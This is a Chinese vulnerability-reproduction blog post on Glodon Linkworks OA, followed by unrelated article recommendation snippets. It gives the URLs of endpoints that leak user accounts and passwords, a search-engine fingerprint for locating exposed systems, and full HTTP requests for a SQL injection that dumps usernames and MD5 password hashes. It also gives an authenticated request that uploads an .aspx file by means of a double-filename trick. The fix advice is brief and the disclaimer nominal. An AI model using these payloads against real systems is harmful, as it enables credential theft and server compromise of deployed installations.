【漏洞复现】广联达OA漏洞合集(信息泄露+SQL注入+文件上传)

2023-09-18 14:21:44

文章目录

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

广联达OA存在信息泄露

一、漏洞概述

广联达Linkworks办公OA存在信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。

二、漏洞复现

系统界面如下
在这里插入图片描述
存在隐患的URL http://url/Org/service/Service.asmx
在这里插入图片描述
查看所有用户 http://url/Org/service/Service.asmx/GetAllUsersXml
在这里插入图片描述
查看所有工程 http://url/Org/service/Service.asmx/GetDeptXml4GEPS
在这里插入图片描述
查看账户密码 http://url/Org/service/Service.asmx/GetUserXml4GEPS
在这里插入图片描述
解密后登录后台系统如下
在这里插入图片描述

三、修复建议

1、禁用泄露敏感信息的页面或应用。
2、升级到安全版本

广联达Linkworks办公OA SQL注入漏洞+后台文件上传漏洞

一、产品简介

广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。

二、漏洞概述

由于广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效过滤,将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登录发送请求包获取服务器权限。

三、复现环境

  • 鹰图指纹: web.body="/Services/Identification/Server/"
    在这里插入图片描述
    访问以下URL验证漏洞是否存在
    http://url/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
    在这里插入图片描述
    如以上情况则证明存在漏洞。

SQL注入
POC:

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: XX.XX.XX.XX:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ASP.NET_SessionId=zldmbkj4ufv4xjlkzvudfs31; GTP_IdServer_LangID=2052; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER –

在这里插入图片描述
使用MD5解密,可尝试登录后台。

后台文件上传
POC:

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: XX.XX.XX.XX:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: 登录后的cookie
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Length: 195

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="2.aspx";filename="1.jpg"
Content-Type: application/text
 
123456
------WebKitFormBoundaryFfJZ4PlAZBixjELj—

在这里插入图片描述
在这里插入图片描述

四、修复建议

1、限制访问来源地址,如非必要,不要将系统开放在互联网上。
2、更新至最新版本

更多推荐

【GIS】地理坐标系WGS84、GCJ-02、BD-09、GCS2000

地理坐标系又可分为参心坐标系和地心坐标系,常见的参心坐标系北京54、西安80,常见的地心坐标系有WGS84、GCJ-02、BD-09、GCS2000地心坐标系WGS84(WorldGeodeticSystem1984)WGS84是为GPS全球定位系统建立的坐标系统,是世界上第一个统一的地心坐标系,因此也被称为大地坐标系

TS中 说说数组在TypeScript中是如何工作的?

在TypeScript中,数组(Array)是一种用于存储多个值的数据结构,它有一些特定的特性和操作方法。数组在TypeScript中的工作方式与JavaScript中的数组类似,但通过类型系统提供了更强大的类型检查和推断。下面是关于TypeScript数组的一些重要信息:1.类型检查和推断:TypeScript可以根

【Linux】进程控制,进程替换

1.进程创建fork函数初识在linux中fork函数时非常重要的函数,它从已存在进程中创建一个新进程。新进程为子进程,而原进程为父进程。#include<unistd.h>pid_tfork(void);返回值:自进程中返回0,父进程返回子进程id,出错返回-1进程调用fork,当控制转移到内核中的fork代码后,内

BD个人总结

Flink01.水位线(watermark)用来度量时间,基于事件时间,数据的时间戳,用来衡量事件时间进展的标记。具体实现上,水位线可以看作一条特殊的数据记录,是插入到数据流中的一个标记点,主要内容就是一个时间戳,用来指示当前的事件时间。水位线也是数据流的一部分,随着数据一起流动,在不同任务之间传输。有序流中的水位线:

递归学习——记忆化搜索

目录​编辑一,概念和效果二,题目1.斐波那契数1.题目2.题目接口3.解题思路2.不同的路径1.题目2.题目接口3.解题思路3.最长增长子序列1.题目2.题目接口3.解题思路4.猜数字游戏II1.题目2.题目接口3.解题思路总结:一,概念和效果记忆化搜索可以说是带备忘录的递归,实现这个算法的目的便是减少递归时对同一个节

JS【filter过滤器】的用法

在JavaScript中,filter()是一个高阶函数,它是数组(Array)的一部分,可用于创建一个新数组,其中包含通过所提供函数实现的测试的所有元素。filter()函数的语法如下:letnewArray=arr.filter(callback(element[,index,[array]])[,thisArg]

用tkinter+selenium做一个CSDN热榜爬虫

文章目录UI设计函数封装功能实现自从学会了分析热榜,就是CSDN热榜分析,每天都要爬下来分析一下热榜都在干什么。但脚本运行到底还是不方便,所以接下来就想办法将其做成一个带有界面的热榜爬虫UI设计做一个热榜爬虫的交互式界面,只需要两个按钮外加两个信息框就足够了,所以布局极其简单classTestSTL:def__init

数据融合的并行计算

1、数据融合的算法数据融合的算法当中,需要对每一个格点i进行逐个计算,公式如下2、出现的问题但是随着背景场的空间分辨率的提高,格点数急剧增加。如空间分辨率为0.01°的话,那么15°✖15°的空间范围内就有1500✖1500个格点。那么在进行逐个格点计算的过程中,就非常耗时间。3、编程我先按照逐点计算并赋值给DataA

布隆过滤器(Bloom Filter)

一,布隆过滤器介绍布隆过滤器(BloomFilter)是一个很长的二进制向量(位图BitMap)和一系列随机映射函数(Hash函数)。它是一种数据结构,可以判断一个元素一定不在集合中或可能存在于集合中。优点:相比于传统的list、set、map等数据结构,它更高效、占用空间更少。缺点:存在误判率二,布隆过滤器原理布隆过

如何保护人工智能隐私?

本文旨在帮助这些消费者建立有关人工智能隐私功能的更深入的知识库。此外,它还为企业主和领导者提供了指南,帮助他们更好地了解客户的担忧,以及如何在不牺牲功能的情况下保护隐私的方式使用人工智能。尽管企业和消费者都对人工智能改变日常生活的潜力感到兴奋,但人工智能的广泛使用所带来的隐私问题仍是一个主要问题。显然,随着越来越多的个

2023上海工博会,正运动展位现场直击(二)

9月21日,上海工博会已经成功开展了2天,热度仍旧不减,正运动技术展位6.1H-E261不仅吸引了大量工业自动化专业人士,而且也为他们呈现了一系列令人印象深刻的产品和运动控制解决方案。其中,高性能软硬件产品引发了广泛关注。一、活动现场产品宣讲活动也成为展位上的一大亮点,正运动技术的产品工程师团队分享了最新的运动控制解决

热文推荐
  1. 做影视特效本地电脑配置不够怎么办?

    影视特效对电脑要求高,往往本地电脑配置不足的情况下,会导致电脑卡顿等造成工作效率低下等问题,再加上现在异地协同的云电脑需求越来越高,更多的企业和个人开始选择做影视特效的云电脑,那么今天就来看看租一台云电脑如何来完成影视制作吧。在当今的影视特效行业中,技术的进步以及计算机硬件和软件的迅速发展,使得制作过程更加高效、便捷。

  2. 基于STM32+华为云IOT设计的智能垃圾桶

    一、项目介绍在商业街、小吃街和景区等人流密集的场所,垃圾桶的及时清理对于提供良好的游客体验至关重要。然而,传统的垃圾桶清理方式通常是定时或定期进行,无法根据实际情况进行及时响应,导致垃圾桶溢满,影响环境卫生,给游客带来不便和不满。为了解决这一问题,本项目基于STM32F103ZET6主控芯片和华为云物联网平台,设计了一

  3. 抱歉,在座的都不会“自己介绍”!

    作者|磊哥来源|公众号:Java中文社群转载请联系授权(微信ID:GG_Stone)细节决定成败,面试本质上是“自我推销”的过程。如何在短短的几十分钟内打动面试官,从来都不是一个简单的问题。所以怎么开场?怎么让面试官对我产生兴趣?非常关键。所以,接下来,我们就来聊聊,如何进行自我介绍?如果一开场就让面试官对你印象深刻。

  4. Python基础分享之缩进和选择

    缩进Python最具特色的是用缩进来标明成块的代码。我下面以if选择结构来举例。if后面跟随条件,如果条件成立,则执行归属于if的一个代码块。先看C语言的表达方式(注意,这是C,不是Python!)if(i>0){x=1;y=2;}如果i>0的话,我们将进行括号中所包括的两个赋值操作。括号中包含的就是块操作,它隶属于i

  5. 实用技巧:Linux上实现OpenGauss数据库远程连接,方便的跨网络数据操作

    文章目录前言1.Linux安装openGauss2.Linux安装cpolar3.创建openGauss主节点端口号公网地址4.远程连接openGauss5.固定连接TCP公网地址6.固定地址连接测试🍁小结🍁前言openGauss是一款开源关系型数据库管理系统,采用木兰宽松许可证v2发行。openGauss内核深度

  6. SpringCloud Alibaba-Seata

    接上文SpringCloudAlibaba-Sentinel1.简介(Seata与分布式事务)Seata官方网址https://seata.io/zh-cn/docs/overview/what-is-seata.html2.环境搭建首先对之前的图书借阅系统进行升级:编写对应的服务接口。(1)用户服务(2)图书服务(3

  7. UDP协议

    本篇介绍再谈端口号,并补充信息介绍netsta&pidof两个新指令UDP协议UDP协议格式理解报头是什么UDP特点介绍那些应用层协议基于UDP全双工概率补充在前面已经完成了应用层的基本内容,现在进入传输层传输层负责数据能够从发送端传输接收端.解决通信问题端口号补充1:再谈端口号端口号(Port)标识了一个主机上进行通

  8. Docker

    目录Docker什么是Docker?Docker和虚拟机的差异Docker架构Docker的安装卸载(可选)安装docker启动docker配置镜像加速Docker什么是Docker?Docker是一个快速交付应用、运行应用的技术,具备下列优势:将程序及其依赖、运行环境一起打包为一个镜像,可以在任意Linux操作系统下

  9. Spring面试题3:说一说MVC框架的底层实现

    该文章专注于面试,面试只要回答关键点即可,不需要对框架有非常深入的回答,如果你想应付面试,是足够了,抓住关键点面试官:说一说MVC框架的底层实现MVC(Model-View-Controller)是一种软件设计模式,常被用于构建用户界面和应用程序的架构。MVC框架的底层实现可以分为以下几个部分:模型(Model):模型